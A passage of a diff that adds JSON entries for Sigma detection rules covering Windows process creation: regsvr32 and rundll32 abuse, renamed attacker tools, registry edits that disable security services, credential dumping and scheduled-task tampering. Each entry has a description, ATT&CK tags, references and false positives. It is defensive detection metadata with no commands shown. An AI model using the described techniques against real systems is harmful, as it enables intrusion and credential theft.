+ "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/07/13", + "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "value": "Suspicious Regsvr32 HTTP IP Pattern", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", + "https://twitter.com/tccontre18/status/1480950986650832903", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "FQDNs that start with a number" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files", + "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "value": "Suspicious Regsvr32 Execution With Image Extension", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2021/11/29", + "filename": "proc_creation_win_susp_regsvr32_image.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "uuid": "50919691-7302-437f-8e10-1fe088afa145", + "value": "Regsvr32 Command Line Without DLL", + "meta": { + "refs": [ + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574", + "attack.execution" + ], + "creation_date": "2019/07/17", + "filename": "proc_creation_win_susp_regsvr32_no_dll.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", + "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "value": "Suspicious Regsvr32 Execution From Remote Share", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2022/10/31", + "filename": "proc_creation_win_susp_regsvr32_remote_share.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "value": "Regsvr32 Spawning Explorer", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-april-2022/", + "https://www.echotrail.io/insights/search/regsvr32.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2022/05/05", + "filename": "proc_creation_win_susp_regsvr32_spawn_explorer.yml", + "author": "elhoim", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "value": "Reg Add Suspicious Paths", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562.001" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_susp_reg_add.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare legitimate add to registry via cli (to these locations)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "value": "Suspicious Reg Add BitLocker", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2021/11/15", + "filename": "proc_creation_win_susp_reg_bitlocker.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", + "value": "Reg Disable Security Service", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/1415295021041979392", + "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", + "https://vms.drweb.fr/virus/?i=24144899", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/14", + "filename": "proc_creation_win_susp_reg_disable_sec_services.yml", + "author": "Florian Roth, John Lambert (idea), elhoim", + "level": "high", + "falsepositive": [ + "Unknown", + "Other security solution installers" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "value": "Suspicious Reg Add Open Command", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2021/12/20", + "filename": "proc_creation_win_susp_reg_open_command.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", + "value": "Renamed AdFind Detection", + "meta": { + "refs": [ + "https://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" + ], + "creation_date": "2022/08/21", + "filename": "proc_creation_win_susp_renamed_adfind.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "uuid": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "value": "Renamed CreateDump Process Dump", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], + "creation_date": "2022/09/20", + "filename": "proc_creation_win_susp_renamed_createdump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Command lines that use the same flags" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "value": "Renamed ZOHO Dctask64", + "meta": { + "refs": [ + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" + ], + "creation_date": "2020/01/28", + "filename": "proc_creation_win_susp_renamed_dctask64.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown yet" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious renamed SysInternals DebugView execution", + "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "value": "Renamed SysInternals Debug View", + "meta": { + "refs": [ + "https://www.epicturla.com/blog/sysinturla", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2020/05/28", + "filename": "proc_creation_win_susp_renamed_debugview.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "value": "Renamed PAExec", + "meta": { + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2021/05/22", + "filename": "proc_creation_win_susp_renamed_paexec.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", + "value": "Capture Credentials with Rpcping.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", + "https://twitter.com/vysecurity/status/974806438316072960", + "https://twitter.com/vysecurity/status/873181705024266241", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_susp_rpcping.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process related to rundll32 based on arguments", + "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", + "value": "Suspicious Rundll32 Activity", + "meta": { + "refs": [ + "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", + "https://twitter.com/Hexacorn/status/885258886428725250", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://twitter.com/nas_bench/status/1433344116071583746", + "https://twitter.com/eral4m/status/1479106975967240209", + "https://twitter.com/eral4m/status/1479080793003671557", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_rundll32_activity.yml", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "value": "Suspicious Call by Ordinal", + "meta": { + "refs": [ + "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", + "https://github.com/Neo23x0/DLLRunner", + "https://twitter.com/cyb3rops/status/1186631731543236608", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2019/10/22", + "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", + "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "value": "Suspicious Rundll32 Invoking Inline VBScript", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2021/03/05", + "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "value": "Rundll32 JS RunHTMLApplication Pattern", + "meta": { + "refs": [ + "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/01/14", + "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "value": "Suspicious Key Manager Access", + "meta": { + "refs": [ + "https://twitter.com/NinjaParanoid/status/1516442028963659777", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ], + "creation_date": "2022/04/21", + "filename": "proc_creation_win_susp_rundll32_keymgr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", + "value": "Suspicious Rundll32 Without Any CommandLine Params", + "meta": { + "refs": [ + "https://www.cobaltstrike.com/help-opsec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2021/05/27", + "filename": "proc_creation_win_susp_rundll32_no_params.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Possible but rare" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process related to rundll32 based on arguments", + "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "value": "Suspicious Rundll32 Script in CommandLine", + "meta": { + "refs": [ + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2021/12/04", + "filename": "proc_creation_win_susp_rundll32_script_run.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", + "value": "Suspicious Rundll32 Setupapi.dll Activity", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", + "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", + "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", + "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml", + "author": "Konstantin Grishchenko, oscd.community", + "level": "medium", + "falsepositive": [ + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "value": "RunDLL32 Spawning Explorer", + "meta": { + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2022/04/27", + "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml", + "author": "elhoim, CD_ROM_", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "uuid": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "value": "Suspicious Rundll32 Activity Invoking Sys File", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2021/03/05", + "filename": "proc_creation_win_susp_rundll32_sys.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", + "value": "Suspicious Workstation Locking via Rundll32", + "meta": { + "refs": [ + "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/06/04", + "filename": "proc_creation_win_susp_rundll32_user32_dll.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects the execution of Run Once task as configured in the registry", + "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "value": "Run Once Task Execution as Configured in Registry", + "meta": { + "refs": [ + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/10/18", + "filename": "proc_creation_win_susp_runonce_execution.yml", + "author": "Avneet Singh @v3t0_, oscd.community", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "value": "Suspicious Runscripthelper.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_susp_runscripthelper.yml", + "author": "Victor Sergeev, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process run from unusual locations", + "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", + "value": "Suspicious Process Start Locations", + "meta": { + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-05-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_run_locations.yml", + "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\\Program Files')", + "uuid": "e01fa958-6893-41d4-ae03-182477c5e77d", + "value": "Execution of Remote Utilities RAT (RURAT) From Unusual Location", + "meta": { + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/09/19", + "filename": "proc_creation_win_susp_rurat_exec_location.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "value": "Suspicious Modification Of Scheduled Tasks", + "meta": { + "refs": [ + "Internal Research", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/07/28", + "filename": "proc_creation_win_susp_schtasks_change.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when adversaries stop services or processes by deleting their respective schdueled tasks in order to conduct data destructive activities", + "uuid": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", + "value": "Delete Important Scheduled Task", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_susp_schtasks_delete.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "uuid": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "value": "Delete All Scheduled Tasks", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_susp_schtasks_delete_all.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when adversaries stop services or processes by disabling their respective schdueled tasks in order to conduct data destructive activities", + "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "value": "Disable Important Scheduled Task", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ], + "creation_date": "2021/12/26", + "filename": "proc_creation_win_susp_schtasks_disable.yml", + "author": "frack113, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "uuid": "81325ce1-be01-4250-944f-b4789644556f", + "value": "Suspicious Schtasks From Env Var Folder", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", + "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ], + "creation_date": "2022/02/21", + "filename": "proc_creation_win_susp_schtasks_env_folder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "uuid": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "value": "Schtasks From Suspicious Folders", + "meta": { + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", + 